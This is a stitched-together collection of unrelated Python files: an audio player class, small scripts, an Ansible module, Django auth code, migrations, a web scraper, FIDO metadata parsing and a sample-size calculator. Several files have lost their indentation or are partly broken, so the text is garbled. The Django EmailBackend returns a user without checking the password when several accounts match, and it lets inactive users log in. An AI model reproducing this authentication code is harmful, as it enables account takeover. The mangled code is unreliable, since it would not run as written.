        slen = BASS_ChannelBytes2Seconds(self.handle, _len)
        return slen

    @property
    def length_time(self):
        """
        Get length of stream in human readable format (MM:SS) .
        Returns:
            Length of stream.
        """
        seconds = int(self.length % 60)
        minutes = int(self.length // 60)
        return f"{minutes:02}:{seconds:02}"

    @property
    def position(self):
        """
        Get the position of the stream in seconds.
        Returns:
            Position of stream.
        """
        try:
            buf = BASS_ChannelGetPosition(self.handle, BASS_POS_BYTE)
            sbuf = BASS_ChannelBytes2Seconds(self.handle, buf)
            return sbuf
        except Exception as error:
            logger.debug("Get position of stream")
            logger.exception(error)
            return False

    @property
    def position_time(self):
        """
        Get the position of the stream in human readable format (MM:SS)
        Returns:
            Position of stream.
        """
        seconds = int(self.position % 60)
        minutes = int(self.position // 60)
        return f"{minutes:02}:{seconds:02}"

    @property
    def position_bytes(self):
        """
        Get the position of the stream in bytes.
        Returns:
            Position of stream in bytes.
        """
        return BASS_ChannelGetPosition(self.handle, BASS_POS_BYTE)

    @property
    def remaining(self):
        """
        Get remaining time.
        Return:
            Remaining time in seconds
        """
        return self.length - self.position

    @property
    def remaining_time(self):
        """
        Get remaining time in human readable format.
        Return:
            Remaining time in human readable format (MM:SS)
        """
        seconds = int(self.remaining % 60)
        minutes = int(self.remaining // 60)
        return f"{minutes:02}:{seconds:02}"

    def isPaused(self):
        """Return True if the channel is currently paused."""
        status = BASS_ChannelIsActive(self.handle)
        return status == BASS_ACTIVE_PAUSED

    def isPlaying(self):
        """Return True if the channel is currently playing."""
        status = BASS_ChannelIsActive(self.handle)
        return status == BASS_ACTIVE_PLAYING

    def pause_play_toggle(self):
        """
        Toggle play/pause
        Returns:
            None.
        """
        status = BASS_ChannelIsActive(self.handle)
        if status == BASS_ACTIVE_PAUSED:
            self.play()
        elif status == BASS_ACTIVE_PLAYING:
            self.pause()

    def move_to_position_bytes(self, pos):
        """
        Set the playback position.
        Arguments:
            pos: Position to set to (using bytes as units).
        Returns:
            True if successful else False.
        """
        logger.debug("Move to position 'pos' in stream (using bytes)")
        try:
            return BASS_ChannelSetPosition(self.handle, pos, BASS_POS_BYTE)
        except Exception as error:
            logger.exception(error)
            return False

    def move_to_position_seconds(self, pos):
        """
        Set the playback position.
        Arguments:
            pos: Position to set to (using seconds as units).
        Returns:
            True if successful else False.
        """
        logger.debug("Move to position 'pos' in stream (using seconds)")
        try:
            # renamed from `bytes`, which shadowed the builtin
            byte_pos = BASS_ChannelSeconds2Bytes(self.handle, pos)
            return BASS_ChannelSetPosition(self.handle, byte_pos, BASS_POS_BYTE)
        except Exception as error:
            logger.exception(error)
            return False

    def seek_by_bytes(self, s):
        """
        Seek playback from current position.
        Arguments:
            s: Bytes to seek.
        returns:
            None.
        """
        # NOTE(review): 124000 is presumably an approximate bytes-per-second
        # figure for the configured sample format — confirm.
        self.move_to_position_bytes(self.position_bytes + (s * 124000))

    def seek(self, s):
        """
        Seek playback from current position.
        Arguments:
            s: Seconds to seek.
        returns:
            None.
        """
        # Halve the step recursively while it would overshoot either end.
        if (s < 0 and abs(s) > self.position):
            self.seek(s/2)
        elif (self.remaining > 0 and s > self.remaining):
            self.seek(s/2)
        self.move_to_position_seconds(self.position + s)

    def change_tempo(self, s):
        """
        Change tempo of stream.
        Arguments:
            s: Add tempo by
        Returns:
            True if successful else False.
        """
        logger.debug("Change stream tempo/speed")
        self.tempo += s
        try:
            return BASS_ChannelSetAttribute(
                self.stream, BASS_ATTRIB_TEMPO, self.tempo
            )
        except Exception as error:
            # Log error
            logger.exception(error)
            return False

    def restore_tempo(self):
        """
        Restore tempo of stream.
        Returns:
            True if successful else False.
        """
        logger.debug("Restore original stream tempo")
        self.tempo = 0
        try:
            return BASS_ChannelSetAttribute(
                self.stream, BASS_ATTRIB_TEMPO, self.tempo
            )
        except Exception as error:
            logger.exception(error)
            return False

    @property
    def volume(self):
        """
        Master Output Volume.
        Returns:
            Master current volume level.
        """
        return BASS_GetVolume()

    def set_volume(self, volume):
        """
        Set Output Master Volume.
        Arguments:
            volume: The volume level to set to.
        Returns:
            True if successful else False.
        """
        return BASS_SetVolume(volume)
|
import heapq

# Read n jobs as (duration, growth). Run the currently-cheapest job k times;
# after each run its next duration grows by its growth value. Print total time.
n, k = map(int, input().split())
heap = []
for _ in range(n):
    duration, growth = map(int, input().split())
    heapq.heappush(heap, (duration, growth))
# print(heap)
total = 0
for _ in range(k):
    duration, growth = heapq.heappop(heap)
    total += duration
    heapq.heappush(heap, (duration + growth, growth))
print(total)
|
"""Update test files
Temporary helper script
Copyright (c) 2020 Peter Triesberger.
For further information see https://github.com/peter88213/yW2OO
Published under the MIT License (https://opensource.org/licenses/mit-license.php)
"""
import os
find = '''<office:font-face-decls>
<style:font-face style:name="StarSymbol" svg:font-family="StarSymbol" style:font-charset="x-symbol"/>
<style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-adornments="Standard" style:font-family-generic="modern" style:font-pitch="fixed"/>
</office:font-face-decls>
'''
replace = '''<office:font-face-decls>
<style:font-face style:name="StarSymbol" svg:font-family="StarSymbol" style:font-charset="x-symbol"/>
<style:font-face style:name="Consolas" svg:font-family="Consolas" style:font-adornments="Standard" style:font-family-generic="modern" style:font-pitch="fixed"/>
<style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-adornments="Standard" style:font-family-generic="modern" style:font-pitch="fixed"/>
</office:font-face-decls>
'''
# documents = f{os.environ['USERPROFILE']}\\Documents'
documents = '../test/data'
pathList = []
for (path, dirs, files) in os.walk(documents):
for file in files:
if file == 'content.xml':
filepath = (f'{path}/{file}').replace('\\', '/')
with open(filepath, 'r', encoding='utf-8') as f:
text = f.read()
modified = False
if find in text:
modified = True
text = text.replace(find, replace)
if modified:
with open(filepath, 'w', encoding='utf-8') as f:
f.write(text)
print(f'{filepath} written\n')
else:
print(f'--- {filepath} skipped\n')
|
#!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = r'''
module: goodbye_world
short_description: goodbye world
author:
- "Nathan Weatherly (@nathanweatherly)"
description:
- Says goodbye to goodbye_target, returning a full greeting string.
options:
goodbye_target:
description:
- This field is the name to greet.
- It is a string.
- The default target is world
- Fourth line of description.
type: str
default: world
required: False
'''
EXAMPLES = r'''
- name: "Say goodbye to program"
nathanweatherly.totally_not_fake.goodbye_world:
goodbye_target: Program
register: full_goodbye
- name: "Say goodbye to World"
nathanweatherly.totally_not_fake.goodbye_world:
register: full_goodbye
'''
RETURN = r'''
full_goodbye:
description: Full parting to goodbye_target
returned: success
type: str
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
def execute_module(module: AnsibleModule):
    """Build the goodbye greeting from module params and exit with the result."""
    target = module.params['goodbye_target']
    module.exit_json(changed=True, full_goodbye="Goodbye {0}!".format(target))
def main():
    """Entry point: declare the argument spec, build the module, and run it."""
    module = AnsibleModule(
        argument_spec=dict(
            goodbye_target=dict(type="str", default="world"),
        ),
        supports_check_mode=True,
    )
    execute_module(module)


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 11 01:28:18 2019
@author: Byen23
"""
# 7th Program to be uploaded to github
"""Using Variables and Assign Statements"""
# Compute speed from distance (km) and time (hours) and print it in km/h,
# mph, and m/s. Conversions: miles = km / 1.6, meters = km * 1000,
# seconds = hours * 3600, and speed = distance / time.
distance_in_km = 150
time_in_hours = 2

distance_in_mi = distance_in_km / 1.6
distance_in_mtrs = distance_in_km * 1000
time_in_seconds = time_in_hours * 3600

speed_in_kph = distance_in_km / time_in_hours
speed_in_mph = distance_in_mi / time_in_hours
speed_in_mps = distance_in_mtrs / time_in_seconds

print("The speed in kilometers per hour is:", speed_in_kph)
print("The speed in miles per hour is:", speed_in_mph)
print("The speed in meters per second is:", speed_in_mps)
|
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth import get_user_model
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
# UserModel = get_user_model
# class EmailBackend(ModelBackend):
# def authenticate(self, request, username = None, password = None, **kwargs):
# try:
# user = UserModel.objects.get(
# Q(username__iexact = username) | Q(email__iexact = username)
# )
# except ObjectDoesNotExist:
# UserModel().set_password(password)
# except MultipleObjectsReturned:
# return User.objects.filter(email=username).order_by('id').first()
# else:
# if user.check_password(password) and self.user_can_authenticate(user):
# return user
# def get_user(self, user_id):
# try:
# user = UserModel.objects.get(pk = user_id)
# except ObjectDoesNotExist:
# return None
# return user if self.user_can_authenticate(user) else None
class EmailBackend(ModelBackend):
    """Authenticate with either username or email address.

    Gmail and Googlemail addresses are treated as equivalent: a login with
    either domain matches an account stored under the other.
    """

    @staticmethod
    def _split_email(address):
        """Return (local, domain), splitting at the LAST '@' so local parts
        containing '@' are handled like the original rfind-based code."""
        local, _, domain = address.rpartition('@')
        return local, domain

    def authenticate(self, request, username=None, password=None, **kwargs):
        """Return the matching active user, or None on any failure."""
        UserModel = get_user_model()
        # Fixed: the original crashed with AttributeError when username was
        # None (e.g. when another backend's credentials are passed in).
        if username is None:
            return None
        try:
            lowered = username.lower()
            if '@gmail.com' in lowered or '@googlemail.com' in lowered:
                # Deduplicated: both domain branches did the same split and
                # queried the same pair of candidate addresses.
                email_local, _ = self._split_email(username)
                user = UserModel.objects.get(
                    Q(email__iexact=email_local + '@gmail.com')
                    | Q(email__iexact=email_local + '@googlemail.com')
                )
            else:
                user = UserModel.objects.get(
                    Q(username__iexact=username) | Q(email__iexact=username)
                )
        except UserModel.DoesNotExist:
            return None
        except UserModel.MultipleObjectsReturned:
            return UserModel.objects.filter(email=username).order_by('id').first()
        # NOTE(review): user_can_authenticate() was deliberately commented out
        # in the original, so inactive users can still log in here — confirm.
        if user.check_password(password):
            return user
        return None

    def get_user(self, user_id):
        """Return the user for user_id if it exists and may authenticate."""
        UserModel = get_user_model()
        try:
            user = UserModel.objects.get(pk=user_id)
        except UserModel.DoesNotExist:
            return None
        return user if self.user_can_authenticate(user) else None
from sources.source_gym import source_gym
import numpy as np
##### SOURCE GYM HOPPER
class source_gym_hopper( source_gym ):
    """Gym source wrapping the MuJoCo 'Hopper-v2' environment."""

    ### __INIT__
    def __init__( self ):
        # Delegate environment construction to the shared gym source.
        source_gym.__init__( self , 'Hopper-v2' )

    ### INFORMATION
    def num_actions( self ):
        """Dimensionality of the continuous action vector."""
        return self.env.action_space.shape[0]

    def range_actions( self ):
        """Magnitude of the (symmetric) action bound."""
        return abs(self.env.action_space.high[0])

    ### MAP KEYS
    def map_keys( self , actn ):
        """Clip the action into the env's bounds and prepend a batch axis."""
        space = self.env.action_space
        clipped = np.clip( actn, space.low[0], space.high[0] )
        return np.expand_dims( clipped, 0 )

    ### PROCESS OBSERVATION
    def process( self , obsv ):
        """Observations are passed through unchanged."""
        return obsv
|
from django.urls import include, path
from . import views
# URL routes for the usuario API.
urlpatterns = [
    # Collection and detail endpoints.
    path('', views.ListUsuario.as_view()),
    path('<int:pk>/', views.DetailUsuario.as_view()),
    # Login/logout/password endpoints provided by django-rest-auth.
    path('rest-auth/', include('rest_auth.urls')),
    # Custom sign-in view.
    path('signin', views.signin),
    #path('rest-auth/', include('django_expiring_token.urls')),
]
# Generated by Django 2.2.13 on 2020-09-27 14:56
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the PromoCode table on top of the
    # order-bundles migration.

    dependencies = [
        ('orders', '0003_OrderBundles'),
    ]

    operations = [
        migrations.CreateModel(
            name='PromoCode',
            fields=[
                # Auto PK plus created/modified audit timestamps.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, db_index=True)),
                ('modified', models.DateTimeField(blank=True, db_index=True, null=True)),
                # The code string itself is unique and indexed for lookup.
                ('name', models.CharField(db_index=True, max_length=32, unique=True, verbose_name='Promo Code')),
                ('discount_percent', models.IntegerField(verbose_name='Discount percent')),
                # Codes start out disabled until explicitly activated.
                ('active', models.BooleanField(default=False)),
            ],
            options={
                'verbose_name': 'Promo Code',
                'verbose_name_plural': 'Promo Codes',
            },
        ),
    ]
|
from selenium import webdriver
from bs4 import BeautifulSoup
from pymongo import MongoClient
import re
# Database setting: local MongoDB, database "dbsparta".
client = MongoClient('localhost',27017)
db = client.dbsparta
# NOTE(review): this cursor is never consumed; the collection is written to
# later via db.melon_ticket.insert_one -- this line looks like leftover code.
melon_ticket = db.melon_ticket.find() #creating collection named melon_ticket
# Find artist: build the Melon Ticket artist-page URL.
artist_number=698776 #yerin baek's artist number
artist_id=str(artist_number)
melon_ticket_url="https://ticket.melon.com/artist/index.htm?artistId="+artist_id
# Set up a headless Chrome driver.
# NOTE(review): the `chrome_options=` keyword is deprecated in newer
# Selenium releases (use `options=`) -- confirm the pinned selenium version.
options = webdriver.ChromeOptions()
options.add_argument('headless')
driver = webdriver.Chrome(r"C:\Users\pc\Desktop\chromedriver", chrome_options=options)
driver.implicitly_wait(3) # waiting web source for three seconds implicitly
# Fetch the artist page and hand the rendered HTML to BeautifulSoup.
driver.get(melon_ticket_url)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
# Parse the blocks of interest: notices, show titles/links, and dates.
all_text_notices = soup.find_all('div',{'class':{'show_infor'}})
urls_and_titles = soup.find_all('span',{'class':{'show_title'}})
dates = soup.find_all('td',{'class':{'show_date'}})
#print(dates)
def remove_tag(content):
    """Return *content* with all HTML tags stripped (non-greedy '<...>' match)."""
    return re.sub('<.*?>', '', content)
# Print the first 22 characters of each show date, markup and spaces removed.
for date in dates:
    space_date=remove_tag(str(date))
    raw_date=space_date.replace(" ", "")
    # NOTE(review): rebinding the loop variable `date` is confusing; the
    # cleaned value is only printed, never stored.
    date=raw_date[:22]
    print(date)
#{title:url} database for tickets
b =[]
for i in urls_and_titles:
    links = i.find_all('a')
    for link in links:
        # Build an absolute ticket URL and persist one document per link.
        url='https://ticket.melon.com/'+link['href']
        b.append({i.text:url})
        db.melon_ticket.insert_one({'title':i.text,'url':url})
#print list of the ticket database
#print (b)
'''
#all text notices including status of ticket selling
for n in all_text_notices:
    print(n.text.strip())
#titles
for i in urls_and_titles:
    print(i.text.strip())
'''
|
"""
Test 'conditioner.models' file
"""
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.test import TestCase
from conditioner.models import Rule
from conditioner.tests.factories import RuleFactory, BaseActionFactory, BaseConditionFactory
from conditioner.utils import TimeStampedModelMixin
class RuleTestCase(TestCase):
    """
    Test `conditioner.Rule` model
    """

    def setUp(self):
        super().setUp()
        self.model = Rule
        self.instance = RuleFactory()
        # Link sample action and condition to rule so the string
        # representation and related lookups below have concrete objects
        BaseActionFactory(rule=self.instance)
        BaseConditionFactory(rule=self.instance)

    def test_model_inheritance(self):
        """Test model inheritance"""
        self.assertIsInstance(self.instance, models.Model)
        self.assertIsInstance(self.instance, TimeStampedModelMixin)

    def test_model_target_content_type_field(self):
        """Test model 'target_content_type' field"""
        field = self.model._meta.get_field('target_content_type')
        self.assertIsInstance(field, models.ForeignKey)
        # NOTE(review): `field.rel` was removed in Django 2.0 in favour of
        # `field.remote_field` -- confirm the project's pinned Django version
        self.assertEqual(field.rel.model, ContentType)
        self.assertEqual(field.rel.related_name, 'rules')
        self.assertEqual(field.verbose_name, 'target content type')
        # The FK is optional: a rule may exist without a target content type
        self.assertTrue(field.null)
        self.assertTrue(field.blank)

    def test_model_meta_attributes(self):
        """Test model meta attributes"""
        meta = self.model._meta
        self.assertEqual(meta.verbose_name, 'rule')
        self.assertEqual(meta.verbose_name_plural, 'rules')

    def test_model_target_model_property(self):
        """Test model `target_model()` property"""
        # `target_model` should resolve the ContentType FK to a model class
        self.assertEqual(
            self.instance.target_model,
            self.instance.target_content_type.model_class()
        )

    def test_model_str_method(self):
        """Test model `__str__` method"""
        # The string form mentions the action, condition and target model
        self.assertIn(str(self.instance.action), str(self.instance))
        self.assertIn(str(self.instance.condition), str(self.instance))
        self.assertIn(str(self.instance.target_model), str(self.instance))
|
# Generated by Django 3.2.3 on 2021-05-27 22:33
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: creates BeerOrder and removes the earlier,
    # misspelled 'BeerOder' model it replaces.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('beershareapp', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='BeerOrder',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('amount', models.PositiveIntegerField()),
                # Order lifecycle: Placed -> Accepted/Declined -> Done.
                ('status', models.PositiveSmallIntegerField(choices=[(1, 'Placed'), (2, 'Accepted'), (3, 'Declined'), (4, 'Done')])),
                ('beerCellarEntry', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='beershareapp.beercellarentry')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Drop the typo'd model created by a previous migration.
        migrations.DeleteModel(
            name='BeerOder',
        ),
    ]
|
import os, sys, logging, copy
import signal
import json
import binascii, base64
import argparse
import requests, jwt
from colorama import Fore, Back, Style
from cryptography import x509
from cryptography.hazmat.backends import default_backend
import res.const as const
def read_jwt(url, token):
    """
    Fetch the raw JWT blob for one device from the FIDO metadata repository.

    Parameters
    ----------
    url : str
        Base repository URL for the device entry.
    token : str
        Access token, appended as a `token` query parameter.

    Returns
    -------
    bytes or None
        The response body on HTTP 200; None on any other status or on a
        connection error (a warning/error is logged instead of raising).
    """
    curl_url = url + "?token=" + token
    try:
        logging.info("Device | Calling for device information : " + Fore.LIGHTWHITE_EX + "{}".format(curl_url))
        response = requests.get(curl_url, allow_redirects=True)
        status_code = response.status_code
        reason = response.reason
        content = response.content
        logging.info("Device | Device Status code : " + Fore.LIGHTWHITE_EX + "{} ({})".format(status_code, reason))
        # Fixed typo in the log message: "lenght" -> "length".
        logging.info("Device | Device Content length (encoded) : {} bytes".format(len(content)))
        if status_code == 200:
            # Got an answer, no problem
            return content
        if status_code == 302:
            # Redirection, probably the token is not valid anymore
            logging.warning("The FIDO2 site responded, but the token may be invalid. No data retrieved.")
        else:
            logging.error("Something went wrong with the FIDO2 site. No data retrieved.")
    except requests.exceptions.ConnectionError as err:
        logging.error("Something very bad happened with the API call. " + str(err))
    # Explicit None on every failure path (previously implicit).
    return None
def analyze_device(data):
    """
    Decode one base64url-encoded device entry (a JWT segment) and log its
    FIDO Metadata Statement fields.

    Reference:
    https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-metadata-statement-v2.0-rd-20180702.html#idl-def-MetadataStatement
    Registry of predefined values:
    https://fidoalliance.org/specs/fido-v2.0-rd-20180702/fido-registry-v2.0-rd-20180702.html

    Parameters
    ----------
    data : str or bytes
        Base64url-encoded ('-_' alphabet) JSON metadata statement.

    Returns
    -------
    tuple(dict, dict)
        (device, readable_device): the raw decoded statement, and a copy in
        which registry-coded values are replaced by their human-readable
        const.* decodings.
    """
    #
    # Decoding JWT Header. Just base64. No payload here.
    #
    base64_bytes = base64.b64decode(data, '-_')  # Some infos are strangely encoded...
    device = json.loads(base64_bytes)
    readable_device = {}

    def _copy(key, log=logging.info, fmt=const.str_format):
        # Log the raw value and copy it unchanged into readable_device.
        if key in device:
            log(fmt.format("Device", key, device.get(key)))
            readable_device[key] = device.get(key)

    def _copy_decoded(key, decoder):
        # Decode a registry-coded value through a const.* mapping, then log
        # and store the human-readable form.
        if key in device:
            info = decoder(device.get(key))
            logging.info(const.str_format.format("Device", key, info))
            readable_device[key] = str(info)

    # Field-by-field walk, in the original report order.
    _copy('aaid')                       # UAF Authenticator Attestation ID ("V#M")
    _copy('aaguid')                     # FIDO2 Authenticator Attestation GUID
    _copy('description')                # short English description
    _copy('alternativeDescriptions')    # translations of the description
    _copy('isSecondFactorOnly')         # 2nd-factor-only authenticator?
    _copy('operatingEnv')               # operating environment
    _copy_decoded('verificationMethodDescriptor', const.UserVerificationMethod)
    _copy('supportedExtensions')
    _copy_decoded('matcherProtection', const.MatcherProtection)
    _copy('protocolFamily')             # "uaf", "u2f" or "fido2"
    _copy('upv')                        # unified protocol version(s)
    _copy('isKeyRestricted')            # Uauth key restricted to FIDO assertions?
    _copy_decoded('keyProtection', const.KeyProtection)
    # cryptoStrength is highlighted in green in the report.
    _copy('cryptoStrength', fmt=const.str_format_green)
    _copy_decoded('authenticationAlgorithm', const.AuthenticationAlgorithms)
    _copy_decoded('authenticationAlgorithms', const.AuthenticationAlgorithms)
    _copy_decoded('publicKeyAlgAndEncoding', const.AuthenticationAlgorithms)
    _copy('isFreshUserVerificationRequired')
    _copy_decoded('tcDisplay', const.tc_display)
    _copy('tcDisplayContentType')
    # PNG characteristics are verbose: demoted to debug level.
    _copy('tcDisplayPNGCharacteristics', log=logging.debug)

    # userVerificationDetails: a LIST of alternative user verification
    # methods; each alternative may itself be an "AND" combination of
    # several modalities (fingerprint, fingerprint+password, ...).
    device_key = 'userVerificationDetails'
    if (device_key in device):
        readable_device[device_key] = []
        user_verifications = device.get(device_key)
        for combination in user_verifications:
            # Each element is one user verification method
            verif_method = []
            for modality in combination:
                readable_modality = {}
                if ('userVerification' in modality):
                    info = const.UserVerificationMethod(modality.get('userVerification'))
                    readable_modality['userVerification'] = str(info)
                # Each modality can have one 'userVerification' and optional fields
                for field in modality.keys():
                    if ('userVerification' != field):
                        readable_modality[field] = modality.get(field)
                verif_method.append(copy.deepcopy(readable_modality))
                logging.info(const.str_format.format("Device", device_key, readable_modality))
            readable_device[device_key].append(copy.deepcopy(verif_method))

    _copy('assertionScheme')
    _copy_decoded('attachmentHint', const.AuthenticatorAttachmentHints)

    # attestationRootCertificates: trust anchors (not a chain); rendered by
    # the dedicated certificate helper rather than the generic log line.
    device_key = 'attestationRootCertificates'
    if (device_key in device):
        const.display_cert_list(logging, "Device", "Cert.", device.get(device_key))
        readable_device[device_key] = device.get(device_key)

    _copy('attestationCertificateKeyIdentifiers')
    _copy_decoded('attestationTypes', const.AuthenticatorAttestation)
    _copy('authenticatorVersion')

    # icon: RFC2397-encoded PNG; only its presence/MIME prefix is logged,
    # it is never copied into readable_device.
    device_key = 'icon'
    if (device_key in device):
        icon_type = device.get(device_key).split(";")[0]
        logging.info(const.str_format.format("Device", device_key, "found (" + icon_type + ")"))
    else:
        logging.info(const.str_format.format("Device", device_key, "not found"))

    # legalHeader: log only the first 300 characters, store the full text.
    device_key = 'legalHeader'
    if (device_key in device):
        logging.info(const.str_format.format("Device", device_key, device.get(device_key)[:300] + "..."))
        readable_device[device_key] = device.get(device_key)

    return device, readable_device
#
# This file is a library module: it must be imported, never executed directly.
#
if __name__ == "__main__":
    print("Don't ever call me, stupid!")
    # Non-zero exit so scripts invoking it by mistake fail loudly.
    sys.exit(1)
|
x = 100


def hello(a):
    """Print *a* to stdout.

    Fixed: `print a` is Python-2 statement syntax and a SyntaxError under
    Python 3; `print(a)` behaves identically on both.
    """
    print(a)
|
"""
Purpose: Sample size
Date created: 2020-11-19
Ref:
https://www.qualtrics.com/experience-management/research/determine-sample-size/
https://github.com/shawnohare/samplesize/blob/master/samplesize.py
Contributor(s):
Mark M.
"""
# Prefer the `secrets` re-export of SystemRandom (Python >= 3.6); fall back
# to `random.SystemRandom` -- both wrap the same OS entropy source.
try:
    from secrets import SystemRandom
except ModuleNotFoundError:
    from random import SystemRandom
from math import exp, inf, pi, sqrt, erf
from statistics import mean, stdev
# OS-seeded RNG used by the coverage simulation further down.
rnd = SystemRandom()
# import numpy as np
# x = np.linspace(-4, 4, num = 100)
# def get_z_scr_attrs(a = 0.05, n_trials = 100, samples_per_trial = 1000):
def linspace_(minval, maxval, n_steps = None, stepsize = None):
    """Return evenly spaced floats from *minval* to *maxval* inclusive.

    Exactly one of *n_steps* (number of points) or *stepsize* (increment)
    must be supplied; *n_steps* wins when both are given.

    Raises
    ------
    ValueError
        If neither *n_steps* nor *stepsize* is given (previously this fell
        through and crashed with a TypeError on `minval += None`).
    """
    minval = float(minval)
    maxval = float(maxval)
    if n_steps is not None:
        # n_steps points span n_steps - 1 equal intervals.
        stepsize = (maxval - minval) / float(n_steps - 1)
    elif stepsize is None:
        raise ValueError("provide either n_steps or stepsize")
    output = list()
    # Accumulate until we pass maxval; float rounding may drop the endpoint
    # for non-representable stepsizes, matching the original behaviour.
    while minval <= maxval:
        output.append(minval)
        minval += stepsize
    return output
# Sanity calls for linspace_.  Fixed: the first call passed `maxval` twice
# (positionally as 4 and again as maxval=100), raising TypeError; per the
# commented `np.linspace(-4, 4, num=100)` above, 100 is the point count.
lsp = linspace_(-4, 4, n_steps=100)
lsp = linspace_(0., 3.5, stepsize=0.1)
def norm_probability_density(x):
    """Probability density of the standard normal distribution at *x*.

    phi(x) = exp(-x**2 / 2) / sqrt(2 * pi)

    Fixed: the previous body tried to iterate `range(-inf, x)` (TypeError),
    called its inner CDF helper without an argument, and never returned a
    value -- it could not run at all.
    """
    return exp(-0.5 * x * x) / sqrt(2.0 * pi)
# Build a classic z-table grid: rows step by 0.1 (0.0-3.5), columns add a
# second decimal (0.00-0.10); matrix[c][r] is the z value row + column.
idx_range = list(map(lambda x: round(x/10, 2), range(0, 36)))
col_range = list(map(lambda x: round(x/100, 2), range(0, 11)))
matrix = [[0.] * len(idx_range) for _ in range(len(col_range))]
for r in range(len(idx_range)):
    for c in range(len(col_range)):
        matrix[c][r] = round(idx_range[r] + col_range[c], 4)
# Normalisation constant of the standard normal PDF.
constant = 1 / sqrt(2 * pi)
alpha = 0.05
conf_level = 1 - alpha
# Monte-Carlo check: per epoch, the fraction of U(0,1) draws at or below
# the confidence level (expected ~0.95).
n_trials = 1000
epochs = 100
results = []
for n in range(epochs):
    # rand_vals = [rnd.uniform(0, 1) for _ in range(n_trials)]
    rand_vals = [rnd.random() for _ in range(n_trials)]
    results.append(sum([1 if i <= conf_level else 0 for i in rand_vals]) / n_trials)
# NOTE(review): the result of mean() is discarded -- presumably it was meant
# to be printed or assigned; confirm intent.
mean(results)
def cls_prop(name, datatype):
    """Build a type-checked property storing its value under `__<name>`.

    Assignment raises TypeError unless the value is an instance of
    *datatype*; reads return whatever was last stored.
    """
    storage = f"__{name}"

    def _get(self):
        return getattr(self, storage)

    def _set(self, value):
        if not isinstance(value, datatype):
            raise TypeError(f"Expected data type {datatype}!")
        setattr(self, storage, value)

    return property(_get, _set)
class SampleSize:
    """Container for the inputs of a sample-size calculation.

    Fixed two defects: the `cls_prop(...)` calls discarded their return
    values (so no validation ever happened), and `population_size` was
    declared as `str` although it is assigned a count.
    """

    # Type-validated attributes (see cls_prop): assignment through these
    # properties raises TypeError on a wrong type.
    population_size = cls_prop("population_size", int)
    alpha = cls_prop("alpha", float)
    margin_of_error = cls_prop("margin_of_error", float)

    def __init__(self, population_size, alpha=0.05, margin_of_error = 0.05):
        self.population_size = population_size
        self.alpha = alpha
        # Confidence level implied by alpha (e.g. 0.95 for alpha=0.05).
        self.ci = 1 - alpha
        self.margin_of_error = margin_of_error
# Calculated
import scipy.stats as ss
def _get_conf_lvl(a):
return round(ss.norm.ppf(1 - (a/2)), 4)
def sampleSize(population_size, margin_error = .05, confidence_level = .99, sigma = 1/2):
    """
    Calculate the minimal sample size to use to achieve a certain
    margin of error and confidence level for a sample estimate
    of the population mean.
    Inputs
    -------
    population_size: integer
        Total size of the population that the sample is to be drawn from.
    margin_error: number
        Maximum expected difference between the true population parameter,
        such as the mean, and the sample estimate.
    confidence_level: number in the interval (0, 1)
        If we were to draw a large number of equal-size samples
        from the population, the true population parameter
        should lie within this percentage
        of the intervals (sample_parameter - e, sample_parameter + e)
        where e is the margin_error.
    sigma: number
        The standard deviation of the population. For the case
        of estimating a parameter in the interval [0, 1], sigma=1/2
        should be sufficient.
    """
    alpha = 1 - (confidence_level)
    # Pre-tabulated two-tailed z-values for common confidence levels.
    zdict = {
        .90: 1.645,
        .91: 1.695,
        .99: 2.576,
        .97: 2.17,
        .94: 1.881,
        .93: 1.812,
        .95: 1.96,
        .98: 2.326,
        .96: 2.054,
        .92: 1.751
    }
    if confidence_level in zdict:
        z = zdict[confidence_level]
    else:
        # Fall back to the exact quantile for uncommon levels.
        from scipy.stats import norm
        z = norm.ppf(1 - (alpha/2))
    # BUGFIX: the original unconditionally overwrote z with
    # _get_conf_lvl(alpha) here, turning the whole zdict/ppf branch above
    # into dead code.
    N = population_size
    M = margin_error
    # Finite-population-corrected sample size formula.
    numerator = z**2 * sigma**2 * (N / (N-1))
    denom = M**2 + ((z**2 * sigma**2)/(N-1))
    return numerator/denom
from math import ceil

# Worked example: minimal sample size for n=768, 5% margin, 99% confidence.
n = 768
moe = 0.05
alpha = 0.01
std = 0.5
z = _get_conf_lvl(alpha)
const = z**2 * std**2
numerator = const * (n / (n-1))
denom = (moe ** 2) + (const / (n-1))
# Round up to the next whole subject. The original `(numerator//denom)+1`
# over-counted by one whenever the ratio was already a whole number.
samplesize = ceil(numerator / denom)
import datetime
from collections import OrderedDict
from pathlib import Path
from typing import Mapping, Tuple
import dateutil.parser
import pytz
from synctogit.filename_sanitizer import denormalize_filename
from synctogit.service.notes.stored_note import CorruptedNoteError, StoredNote
from .models import OneNotePage, OneNotePageId, OneNotePageMetadata
class OneNoteStoredNote(StoredNote):
    """Serialization helpers for OneNote pages stored on disk as HTML."""
    @classmethod
    def note_to_html(cls, note: OneNotePage, timezone: pytz.BaseTzInfo) -> bytes:
        """Render the page as HTML with a metadata header block prepended."""
        note_header = OrderedDict()  # type: Mapping[str, str]
        for k in ["id", "title", "created", "last_modified"]:
            v = getattr(note.info, k)
